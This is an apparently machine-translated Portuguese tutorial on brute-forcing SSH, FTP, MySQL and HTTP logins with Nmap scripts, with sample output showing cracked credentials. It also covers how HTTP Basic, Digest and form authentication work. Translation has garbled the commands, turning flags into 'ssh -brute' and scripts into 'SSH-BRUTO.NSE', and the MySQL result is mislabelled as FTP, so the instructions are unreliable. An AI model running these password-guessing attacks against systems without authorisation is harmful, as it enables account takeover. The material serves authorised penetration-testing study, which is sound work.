Força bruta de senha usando NMAP

Força bruta de senha usando NMAP
Para serviços on-line de força bruta, as pessoas normalmente usam Hydra, Medusa e Metasploit Framework, mas o NMAP também pode ser usado para forçar muitos serviços on-line. Existem scripts NMAP embutidos que suportam FTP, MySQL, SMTP, SNMP, SSH, Telnet, LDAP e outros serviços. Você também pode formar métodos de autenticação de formulário HTTP, BASIC e DIGEST, Métodos de Autenticação. Se você tiver o NMAP instalado, poderá ver esses scripts no diretório "/usr/share/nmap/scripts".
ubuntu@ubuntu: ~ upgrade APT APT e sudo apt e sudo apt
ubuntu@ubuntu: ~ $ sudo apt install nmap -y
ubuntu@ubuntu: ~ $ cd/usr/share/nmap/scripts/
ubuntu@ubuntu: ~ $ ls *bruto *

Neste tutorial, exploraremos como podemos usar o NMAP para um ataque de força bruta.

SSH Brute-Force

SSH é um protocolo de administração remota segura e suporta autenticação baseada em senha e senha. Para autenticação baseada em senha SSH da Força Bruta, podemos usar “SSH-BRUTE.script nmap nse.

ubuntu@ubuntu:/usr/share/nmap/script/$ ls*ssh*bruto*
SSH-BRUTO.NSE

Passe o nome de usuário e a lista de senhas como um argumento para o NMAP.

ubuntu@ubuntu: ~ $ nmap -script ssh -brute -p22 192.168.43.181
--script-args userdb = usuários.txt, passdb = senhas.TXT
Iniciando NMAP 7.70 (https: // nmap.org) em 2020-02-08 17:09 PKT
Relatório de varredura NMAP para 192.168.43.181
Host está em alta (0.00033s latência).
Serviço de Estado Portuário
22/TCP Open SSH
| SSH-BRUTE:
| Contas:
| Admin: P4SSW0RD - Credenciais válidas
| _ Statistics: realizou 99 palpites em 60 segundos, TPS médio: 1.7
NMAP Concluído: 1 Endereço IP (1 host Up) Digitalizado em 60.17 segundos

FTP-Force bruto

FTP é um protocolo de transferência de arquivos que suporta autenticação baseada em senha. Para FTP de força bruta, usaremos “FTP-BRUTE.script nmap nse.

ubuntu@ubuntu:/usr/share/nmap/script/$ ls*ftp*bruto*
FTP-BRUTO.NSE

Passe o nome de usuário e a lista de senhas como um argumento para o NMAP.

ubuntu@ubuntu: ~ $ nmap -script ftp -brut -brut -p21 192.168.43.181-Script-Args
userDB = usuários.txt, passdb = senhas.TXT
Iniciando NMAP 7.70 (https: // nmap.org) em 2020-02-08 16:51 PKT
Relatório de varredura NMAP para 192.168.43.181
Host está em alta (0.00021s latência).
Serviço de Estado Portuário
21/tcp aberto ftp
| FTP-BRUTO:
| Contas:
| Admin: P4SSW0RD - Credenciais válidas
| _ Statistics: realizou 99 palpites em 20 segundos, TPS médio: 5.0
NMAP Concluído: 1 Endereço IP (1 host Up) Digitalizado em 19.50 segundos

Mysql Brute-Force

Às vezes, o MySQL é deixado aberto a conexões externas e permite que qualquer pessoa se conecte a ele. Sua senha pode ser quebrada usando o NMAP com o script "MySQL-BRUTE".

ubuntu@ubuntu: ~ $ sudo nmap -script mysql -brute -p3306 192.168.43.181
--script-args userdb = usuários.txt, passdb = senhas.TXT
Iniciando NMAP 7.70 (https: // nmap.org) em 2020-02-08 16:51 PKT
Relatório de varredura NMAP para 192.168.43.181
Host está em alta (0.00021s latência).
Serviço de Estado Portuário
3306/tcp aberto mysql
| FTP-BRUTO:
| Contas:
| Admin: P4SSW0RD - Credenciais válidas
| _ Statistics: realizou 99 palpites em 20 segundos, TPS médio: 5.0
NMAP Concluído: 1 Endereço IP (1 host Up) Digitalizado em 19.40 segundos

HTTP Brute-Force

O HTTP usa três tipos de autenticação para autenticar usuários para servidores da Web. Essas metodologias são usadas em roteadores, modems e aplicativos da Web avançados para trocar nomes de usuário e senhas. Esses tipos são:

Autenticação básica

No protocolo de autenticação básica HTTP, o navegador codifica o nome de usuário e a senha com base64 e o envia sob o cabeçalho da “autorização”. Você pode ver isso na captura de tela seguinte.

Autorização: YWRTAW46YWRTAW4 = básico =

Você pode basear64 decodificar esta string para ver o nome de usuário e a senha

ubuntu@ubuntu: ~ $ echo ywrtaw46ywrtaw4 = | base64 -d
Admin: Admin

A autenticação básica HTTP é insegura porque envia nome de usuário e senha em texto simples. Qualquer atacante de homem no meio pode interceptar facilmente o tráfego e decodificar a string para obter a senha.

Autenticação Digest

A autenticação HTTP Digest usa técnicas de hash para criptografar o nome de usuário e a senha antes de enviá -lo para o servidor.

Hash1 = md5 (nome de usuário: reino: senha)
Hash2 = md5 (método: digesturi)
Resposta = MD5 (Hash1: Nonce: NonCecount: CNOnce: QOP: Hash2)

Você pode ver esses valores sob o cabeçalho da "autorização".

A autenticação baseada em digestão é segura porque a senha não é enviada em texto simples. Se um atacante de homem no meio interceptar o tráfego, ele não poderá obter a senha de texto simples.

Autenticação baseada em formulário

As autenticações básicas e digestas suportam apenas a transferência de nome de usuário e senha, enquanto a autenticação baseada em formulário pode ser personalizada com base nas necessidades do usuário. Você pode construir sua própria página da Web em HTML ou JavaScript para aplicar suas próprias técnicas de codificação e transferência.

Geralmente dados em autenticação baseada em formulários são enviados em texto simples. Para problemas de segurança, os HTTPs devem ser aplicados para evitar ataques de homem no meio.

Podemos força bruta todos os tipos de autenticação HTTP usando NMAP. Usaremos o script "HTTP-BRUTE" para esse fim.

ubuntu@ubuntu:/usr/share/nmap/script/$ ls*http*bruto*
HTTP-BRUTO.NSE

Para testar este script NMAP, resolveremos um desafio de força bruta hospedada publicamente da Pentester Academy neste URL http: // pentesteracademylab.AppSpot.com/lab/webApp/BasicAuth.

Precisamos fornecer tudo, incluindo nome de host, URI, método de solicitação e dicionários separadamente como um argumento de script.

ubuntu@ubuntu: ~ sudo nmap -p80 -script http -bruta -bruta pentesteracademylab.AppSpot.com
--Script-ARGS HTTP-BRUTO.HostName = Pentesteracademylab.AppSpot.com,
HTTP-BRUTO.caminho =/lab/webapp/basicauth, userdb = usuários.txt, passdb = senhas.TXT,
HTTP-BRUTO.Método = POST
Iniciando NMAP 7.70 (https: // nmap.org) em 2020-02-08 21:37 PKT
Relatório de varredura NMAP para Pentesteracademylab.AppSpot.com (216.58.210.84)
Host está em alta (0.Latência dos anos 20).
Outros endereços para pentesteracademylab.AppSpot.com (não digitalizado): 2a00: 1450: 4018: 803 :: 2014
RDNS Record para 216.58.210.84: MCT01S06-IN-F84.1E100.líquido
Serviço de Estado Portuário
80/tcp aberto http
| HTTP-BRUTE:
| Contas:
| Admin: Aaddd - Credenciais válidas
| _ Statistics: realizou 165 palpites em 29 segundos, TPS médio: 5.3
NMAP Concluído: 1 Endereço IP (1 Host Up) Digitalizado em 31.22 segundos

Conclusão

NMAP pode ser usado para fazer muitas coisas, apesar apenas de simples digitalização portuária. Ele pode substituir o metasploit, hidra, medusa e muitas outras ferramentas feitas especialmente para forçar bruto online. O NMAP possui scripts internos simples e fáceis de usar que force bruta quase todos os serviços, incluindo HTTP, Telnel, SSH, MySQL, Samba e outros.